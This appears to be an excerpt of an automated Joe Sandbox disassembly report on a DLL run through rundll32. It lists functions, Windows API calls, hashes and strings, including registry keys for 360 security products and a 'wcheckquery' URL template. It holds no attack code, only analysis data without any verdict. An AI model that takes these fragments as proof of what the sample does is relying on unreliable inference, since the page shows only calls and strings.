memset.MSVCRT ref: 0000000180056D5A
SHGetValueW.SHLWAPI(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056D9C

Part of subcall function 0000000180056534: memset.MSVCRT ref: 0000000180056572
Part of subcall function 0000000180056534: GetModuleFileNameW.KERNEL32 ref: 0000000180056589
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565AD
Part of subcall function 0000000180056534: _wcsicmp.MSVCRT ref: 00000001800565C8
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565DE

LeaveCriticalSection.KERNEL32(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056DCF

Strings

SOFTWARE\Wow6432Node\360EDRSensor, xrefs: 0000000180056D77
pid, xrefs: 0000000180056CED
SOFTWARE\Wow6432Node\360EntSecurity, xrefs: 0000000180056D80
SOFTWARE\Wow6432Node\360SD, xrefs: 0000000180056CF4
SOFTWARE\Wow6432Node\360Safe\Coop, xrefs: 0000000180056D46
Partner, xrefs: 0000000180056D6E
PartnerName, xrefs: 0000000180056D3F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
API String ID: 264253324-3445957450
Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004808C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 252COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800480D3

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

GetTickCount.KERNEL32 ref: 000000018004825D
srand.MSVCRT ref: 0000000180048265
rand.MSVCRT ref: 000000018004826B
rand.MSVCRT ref: 000000018004829C

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B04B

InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,000000018000644F), ref: 0000000180048390
??3@YAXPEAX@Z.MSVCRT ref: 0000000180048415

Strings

http://%s/wcheckquery, xrefs: 00000001800482EE, 0000000180048331
360safe, xrefs: 00000001800481D5
wificheck, xrefs: 00000001800481F4
wificheck:1, xrefs: 0000000180048215
WifiCheckQuery, xrefs: 0000000180048237

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
API String ID: 2719022499-1298750920
Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066608 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000180066653
RegQueryValueExW.ADVAPI32 ref: 0000000180066696
RegCloseKey.ADVAPI32 ref: 00000001800666AA

Part of subcall function 0000000180066428: RegOpenKeyExW.ADVAPI32 ref: 0000000180066475
Part of subcall function 0000000180066428: RegQueryValueExW.ADVAPI32 ref: 00000001800664BA
Part of subcall function 0000000180066428: RegCloseKey.ADVAPI32 ref: 00000001800664D7
Part of subcall function 0000000180066428: RegOpenKeyExW.ADVAPI32 ref: 00000001800664FE
Part of subcall function 0000000180066428: memset.MSVCRT ref: 0000000180066519
Part of subcall function 0000000180066428: RegQueryValueExW.ADVAPI32 ref: 0000000180066556
Part of subcall function 0000000180066428: RegCloseKey.ADVAPI32 ref: 000000018006656C
Part of subcall function 0000000180066428: PathAppendW.SHLWAPI ref: 000000018006657E
Part of subcall function 0000000180066428: PathFileExistsW.SHLWAPI ref: 0000000180066589
Part of subcall function 0000000180066428: GetProcAddress.KERNEL32 ref: 00000001800665AF
Part of subcall function 0000000180066428: FreeLibrary.KERNEL32 ref: 00000001800665C3

RegCloseKey.ADVAPI32 ref: 00000001800666E1
GetCurrentProcess.KERNEL32 ref: 0000000180066715
OpenProcessToken.ADVAPI32 ref: 0000000180066727
CloseHandle.KERNEL32 ref: 0000000180066748
GetCommandLineW.KERNEL32 ref: 000000018006675D
wcsstr.MSVCRT ref: 000000018006678D

Strings

SOFTWARE\360Safe\360Ent, xrefs: 0000000180066645
/elevated, xrefs: 0000000180066786
ServiceCall, xrefs: 000000018006668B

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
API String ID: 3868077243-983453937
Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002308 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32 ref: 0000000180002336
SHGetSpecialFolderLocation.SHELL32 ref: 000000018000234D

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

GetModuleHandleW.KERNEL32 ref: 000000018000239C
GetProcAddress.KERNEL32 ref: 00000001800023B5
GetCurrentProcess.KERNEL32 ref: 00000001800023C7
wcsstr.MSVCRT ref: 0000000180002407

Strings

(x86), xrefs: 0000000180002437
Kernel32.dll, xrefs: 0000000180002395
\SysWOW64, xrefs: 00000001800023FD
\System32, xrefs: 0000000180002415
IsWow64Process, xrefs: 00000001800023AB

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
API String ID: 3215350457-2087702655
Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800448C4 Relevance: 19.8, APIs: 13, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044908
GetTickCount.KERNEL32 ref: 00000001800449C4
srand.MSVCRT ref: 00000001800449CC
rand.MSVCRT ref: 00000001800449D2
LeaveCriticalSection.KERNEL32 ref: 0000000180044A6F
EnterCriticalSection.KERNEL32 ref: 0000000180044AE0
SysAllocString.OLEAUT32 ref: 0000000180044BF7
SysStringByteLen.OLEAUT32 ref: 0000000180044C0C
SysAllocStringByteLen.OLEAUT32 ref: 0000000180044C17
SysFreeString.OLEAUT32 ref: 0000000180044C26
LeaveCriticalSection.KERNEL32 ref: 0000000180044C63
EnterCriticalSection.KERNEL32 ref: 0000000180044CBE
LeaveCriticalSection.KERNEL32 ref: 0000000180044CD1

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
String ID:
API String ID: 2388112003-0
Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060B20 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F

OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
SysFreeString.OLEAUT32 ref: 0000000180060C89

Strings

QueryFullProcessImageNameW, xrefs: 0000000180060C28
Kernel32.dll, xrefs: 0000000180060C18

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
String ID: Kernel32.dll$QueryFullProcessImageNameW
API String ID: 930578061-1170590071
Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180078A30 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

__C_specific_handler.MSVCRT ref: 0000000180078A39
?terminate@@YAXXZ.MSVCRT ref: 0000000180078A58
abort.MSVCRT ref: 0000000180078A72
_errno.MSVCRT ref: 0000000180078AAA
_errno.MSVCRT ref: 0000000180078B26
iswctype.MSVCRT ref: 0000000180078BF5
_errno.MSVCRT ref: 0000000180078C8D
free.MSVCRT ref: 0000000180078C9D

Strings

csm, xrefs: 0000000180078A45
f, xrefs: 0000000180078A3F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
String ID: csm$f
API String ID: 3008409500-629598281
Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004A39C Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

FindWindowW.USER32 ref: 000000018004A3C8
SetForegroundWindow.USER32 ref: 000000018004A3DB
wcsstr.MSVCRT ref: 000000018004A3FC
memset.MSVCRT ref: 000000018004A46F
ShellExecuteW.SHELL32 ref: 000000018004A5FC

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

Part of subcall function 000000018004AF08: ShellExecuteW.SHELL32 ref: 000000018004AF73

Part of subcall function 0000000180049798: CoInitialize.OLE32 ref: 00000001800497D2
Part of subcall function 0000000180049798: CoCreateInstance.OLE32 ref: 0000000180049805
Part of subcall function 0000000180049798: IUnknown_QueryService.SHLWAPI ref: 0000000180049897

Strings

http://, xrefs: 000000018004A42C
open, xrefs: 000000018004A47A, 000000018004A53B, 000000018004A5F3
Progman, xrefs: 000000018004A3C1
p, xrefs: 000000018004A45C
Program manager, xrefs: 000000018004A3BA

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
String ID: Progman$Program manager$http://$open$p
API String ID: 1516062321-2122229248
Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056400 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 142registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 00000001800564A0

Part of subcall function 0000000180057364: RegQueryValueExW.ADVAPI32 ref: 00000001800573A9

RegCloseKey.ADVAPI32 ref: 00000001800564F2
memset.MSVCRT ref: 0000000180056572
GetModuleFileNameW.KERNEL32 ref: 0000000180056589
PathAppendW.SHLWAPI ref: 00000001800565AD
_wcsicmp.MSVCRT ref: 00000001800565C8
PathAppendW.SHLWAPI ref: 00000001800565DE

Part of subcall function 000000018000892C: GetModuleHandleW.KERNEL32 ref: 0000000180008966
Part of subcall function 000000018000892C: GetProcAddress.KERNEL32 ref: 000000018000897B
Part of subcall function 000000018000892C: RegCloseKey.ADVAPI32 ref: 00000001800089E0

PathFileExistsW.SHLWAPI ref: 00000001800565FA

Strings

safemon\360EDRSensor.exe, xrefs: 00000001800565D2
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe, xrefs: 0000000180056477

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
API String ID: 1838183957-848848004
Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005619C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 141registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

memset.MSVCRT ref: 000000018005623C

Part of subcall function 0000000180057364: RegQueryValueExW.ADVAPI32 ref: 00000001800573A9

RegCloseKey.ADVAPI32 ref: 000000018005628E
memset.MSVCRT ref: 000000018005630E
GetModuleFileNameW.KERNEL32 ref: 0000000180056325
PathAppendW.SHLWAPI ref: 0000000180056349
_wcsicmp.MSVCRT ref: 0000000180056364
PathAppendW.SHLWAPI ref: 000000018005637A

Part of subcall function 000000018000892C: GetModuleHandleW.KERNEL32 ref: 0000000180008966
Part of subcall function 000000018000892C: GetProcAddress.KERNEL32 ref: 000000018000897B
Part of subcall function 000000018000892C: RegCloseKey.ADVAPI32 ref: 00000001800089E0

PathFileExistsW.SHLWAPI ref: 0000000180056396

Strings

safemon\360ExtHost.exe, xrefs: 000000018005636E
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe, xrefs: 0000000180056213

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
API String ID: 1838183957-351904165
Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052160 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 000000018005218D

Part of subcall function 0000000180030EE8: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180030F5A

??3@YAXPEAX@Z.MSVCRT ref: 00000001800521B1
??3@YAXPEAX@Z.MSVCRT ref: 0000000180052230
DeleteCriticalSection.KERNEL32(?,?,?,?,0000000180006BF2), ref: 0000000180052261

Strings

%s\NameSpace_Catalog5\Catalog_Entries64\%012d, xrefs: 0000000180052353
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters, xrefs: 00000001800524C4
Num_Catalog_Entries, xrefs: 0000000180052346
Num_Catalog_Entries64, xrefs: 000000018005233F
%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018005235A, 0000000180052631
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5, xrefs: 00000001800523AF

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@$CriticalDeleteSection
String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
API String ID: 1297904149-2676930693
Opcode ID: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
Instruction ID: 73cc0848a655b1fb88aa06a885314cf1e75da9385d723178a5cf1b8a64167aea
Opcode Fuzzy Hash: 3d1b4d4945e0e21b4209534fb7adf2456145591c447b83fcd6c449b0aaaa6bb8
Instruction Fuzzy Hash: F631F232741B4892EF668F25E4443DC63A0F74ABE0F588621EB5C07BA5CF39D5A9C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003A8D4 Relevance: 16.6, APIs: 11, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

